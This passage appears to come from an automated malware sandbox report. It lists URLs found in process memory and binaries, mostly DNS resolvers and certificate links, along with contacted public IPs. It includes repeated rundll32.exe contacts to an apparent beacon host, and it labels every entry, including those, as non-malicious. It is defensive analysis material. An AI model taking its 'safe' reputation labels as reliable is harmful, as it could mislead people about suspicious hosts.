                                                  https://dns.circl.lu/dns-query?body_hash=fe11740af4db9c5fe45fa40ec16d3fc54fb1c1ec68cc5dc955d2db5a61d7837cfalse
                                                    		high
                                                    https://doh.appliedprivacy.net/query?body_hash=13c96d569f5542e5b37c55a230dfd2e87a18f0e8cba266add5258f12d67bc000false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://doh.crypto.sx/dns-query?dns=yv4BAAABAAAAAAABEGNra215cXZveGpwZHh4ZXEEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQDt0GKHhHtLhiC_vFFWAAwQfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dns.njal.la/dns-query?dns=yv4BAAABAAAAAAABEGlxaGJvYWltYWZzZGlhcWUEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQ82Vwmw5wtmYq_A9KVysKOgfalse
                                                      		high
                                                      https://ibksturm.synology.me:443/dns-query?body_hash=06755ce2d2984c7850d853afcb3425d160ff88080665583e8c7df96d9820f2eefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://hm2buy.com111.exe, 00000006.00000002.2249860601.0000000000778000.00000004.00000020.00020000.00000000.sdmp, 111.exe, 0000001C.00000002.2317100641.0000000000498000.00000004.00000020.00020000.00000000.sdmp, Anycast VPN.url.6.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.bortzmeyer.org/doh-bortzmeyer-fr-policy.htmlBlocksdnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120F4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.tuanleme.nett-Anycast.exe, 0000002B.00000002.4454319070.00000000039F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://ocsps.ssl.com0GQRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://101.101.101.101/index_en.html111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.dnscry.ptgdnscrypt-proxy.exe, 00000029.00000002.4461159840.0000000012470000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461159840.000000001247B000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236825936.000000001246D000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://anycast.kb.help/7-%E5%90%88%E4%BC%99%E4%BA%BA%E9%A1%B9%E7%9B%AE/Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/DNSCrypt/dnscrypt-resolversdnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drfalse
                                                        		high
                                                        http://ocsps.ssl.com0?Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0Anycast.exe, 0000002B.00000002.4453114817.0000000001B10000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drfalse
                                                          		high
                                                          https://www.dnscry.ptfdnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://cryptostorm.is/public-resolvers.md.6.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.dnscry.ptQdnscrypt-proxy.exe, 00000029.00000003.4238206877.0000000012444000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460753356.0000000012446000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://dnscrypt.bednscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://sslcom.crl.certum.pl/ctnca.crl0sQRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drfalse
                                                            		high
                                                            https://support.anycastjsq.com/?uid=Anycast.exe, 0000002B.00000002.4454319070.00000000039F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drfalse
                                                              		high
                                                              http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_Anycast.exe, 0000002B.00000002.4460636264.00000000069E0000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drfalse
                                                                		high
                                                                https://wikimedia-dns.org/dns-query?body_hash=82e05047d2b9c6ae5833cf65f256043b6cd57ad7255797d4fe9b6adnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001218C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.mxilws.buzz:8443/l3rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.dnscry.ptUdnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.switch.ch111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drfalse
                                                                  		high
                                                                  http://www.hardcodet.net/taskbarAnycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp, Anycast.exe, 0000002B.00000002.4454319070.00000000037A1000.00000004.00000800.00020000.00000000.sdmp, Anycast.exe.6.drfalse
                                                                    		high
                                                                    https://github.com/dotnet/corefx/tree/7601f4f6225089ffAnycast.exefalse
                                                                      		high
                                                                      https://ffmuc.net/sdns://AQcAAAAAAAAAGlsyMDAxOjY3ODplNjg6ZjAwMDo6XTo4NDQzIAfQevHP3F2Zdp0_AmaQpwRJZcJdnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://helios.plan9-dns.com/dns-query?body_hash=34e8cc3d524217cbae7043173aef953f2496bb8aa70be861ddbdnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012000000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.dnscry.ptmdnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06rundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.dnscry.ptwdnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.mxilws.buzz:8443/jquery-3.3.1.min.jsr_rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAnycast.exe, 0000002B.00000002.4454319070.00000000037A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://jp.tiarap.org/dns-query?body_hash=255e4e7acdfe600c5a38889c46de48302b59954def3f99af9c27ca88e5dnscrypt-proxy.exe, 00000029.00000003.3417312133.0000000012520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://puredns.org/family111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, public-resolvers.md.6.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://download.dnscrypt.info/resolvers-list/v2/relays.mddnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.mxilws.buzz:8443/llrundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://github.com/getsentry/sentry-dotnetAnycast.exe, Anycast.exe, 0000002B.00000002.4458091074.0000000005AE2000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                          		high
                                                                          https://sdns.360.net/111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.dnscry.pt%dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          https://www.dnscry.ptDNSCry.ptdnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.gombadi.com/edns/edns.htmlsf-psvfcjj4czdu3e3p.tmp.41.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dnswarden.comdnscrypt-proxy.exe, 00000029.00000002.4460187770.00000000123D4000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://doh.ffmuc.net/dns-query?dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.mxilws.buzz:8443/Zrundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dns.mullvad.net179.61.223.47:443comdnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124C6000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          https://download.dnscrypt.info/blacklists/dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://ffmuc.net/Andnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://jp.tiarap.org/dns-query?dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://127.0.0.1:Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://controld.com/free-dnsdnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238314093.0000000012410000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://wevpn.com/dns111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://github.com/hardcodet/wpf-notifyiconAnycast.exe, Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmpfalse
                                                                            		high
                                                                            https://dns.mullvad.net/dns-query?dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://openinternet.io111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460096953.00000000123B2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419459951.00000000124E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239651821.00000000123B0000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.dnscry.pt/dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.fdn.fr/DoHdnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.mxilws.buzz:8443/orundll32.exe, 00000003.00000002.4448461751.000001FF17DAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.dns0.eu/dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120D2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://sslcom.ocsp-certum.com08QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.mxilws.buzz:8443/rrundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.mxilws.buzz:8443/lrundll32.exe, 00000003.00000002.4448461751.000001FF17E9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.dnscry.pt8dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.mxilws.buzz:8443/yrundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://cleanbrowsing.org/DNS-over-HTTPSdnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://dns1.ryan-palmer.com/dns-query?yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABCd02OLlEQm1pJwTvQcbdnscrypt-proxy.exe, 00000029.00000003.3414590888.0000000012562000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://raw.githubusercontent.com/DNSCrypt/dnscrypt-resolvers/master/v2/parental-control.mddnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.mxilws.buzz:8443/jquery-3.3.1.min.js3011b87bd06ad9jDrundll32.exe, 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.mxilws.buzz:8443/llDrundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://html4/loose.dtdanycast-service.exe, 00000022.00000000.2136854681.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000022.00000002.2141658275.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000000.2148298336.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000002.2149618744.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000000.2151447915.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000002.2167398699.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000002.2305155014.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000000.2166163273.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		low
                                                                                https://ahadns.com/public-resolvers.md.6.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://github.com/bhanupratapys/dnswardendnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drfalse
                                                                                  		high
                                                                                  https://www.dnscry.ptk.dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://dnsnl.alekberg.netDNSCdnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.mxilws.buzz/7rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.dnscry.ptshadnscrypt-proxy.exe, 00000029.00000002.4461159840.0000000012470000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239885157.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461159840.000000001247B000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236825936.000000001246D000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QAnycast.exe, 0000002B.00000002.4453114817.0000000001B10000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, 111.exe.4.drfalse
                                                                                    		high
                                                                                    https://cryptostorm.isdnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.mxilws.buzz/#rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    94.140.14.140
                                                                                    		unknownFrance
                                                                                    		137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKfalse
                                                                                    104.36.86.181
                                                                                    		unknownUnited States
                                                                                    		20150ANYNODEUSfalse
                                                                                    93.95.115.21
                                                                                    		unknownNetherlands
                                                                                    		35705PELICAN-ICTNLfalse
                                                                                    108.181.101.67
                                                                                    		unknownCanada
                                                                                    		852ASN852CAfalse
                                                                                    165.231.253.163
                                                                                    		unknownSeychelles
                                                                                    		41564AS41564SEfalse
                                                                                    89.58.6.169
                                                                                    		unknownGermany
                                                                                    		5430FREENETDEfreenetDatenkommunikationsGmbHDEfalse
                                                                                    45.123.188.129
                                                                                    		unknownHong Kong
                                                                                    		133398TELE-ASTeleAsiaLimitedHKfalse
                                                                                    193.238.153.17
                                                                                    		unknownUkraine
                                                                                    		15626ITLASUAfalse
                                                                                    45.14.115.125
                                                                                    		unknownUnited Kingdom
                                                                                    		23033WOWUSfalse
                                                                                    195.206.104.203
                                                                                    		unknownRomania
                                                                                    		9009M247GBfalse
                                                                                    23.26.138.19
                                                                                    		unknownUnited States
                                                                                    		11798ACEDATACENTERS-AS-1USfalse
                                                                                    185.183.106.83
                                                                                    		unknownRomania
                                                                                    		9009M247GBfalse
                                                                                    213.202.216.236
                                                                                    		unknownGermany
                                                                                    		24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEfalse
                                                                                    185.95.218.42
                                                                                    		unknownSwitzerland
                                                                                    		57118COMMUNITYRACK-CZHCHfalse
                                                                                    94.130.135.203
                                                                                    		unknownGermany
                                                                                    		24940HETZNER-ASDEfalse
                                                                                    147.189.136.183
                                                                                    		unknownUnited Kingdom
                                                                                    		786JANETJiscServicesLimitedGBfalse
                                                                                    108.181.63.163
                                                                                    		unknownCanada
                                                                                    		852ASN852CAfalse
                                                                                    76.76.2.11
                                                                                    		unknownUnited States
                                                                                    		397540WINDSCRIBECAfalse
                                                                                    185.199.109.133
                                                                                    		unknownNetherlands
                                                                                    		54113FASTLYUSfalse
                                                                                    5.255.105.24
                                                                                    		unknownNetherlands
                                                                                    		60404LITESERVERNLfalse
                                                                                    103.87.68.194
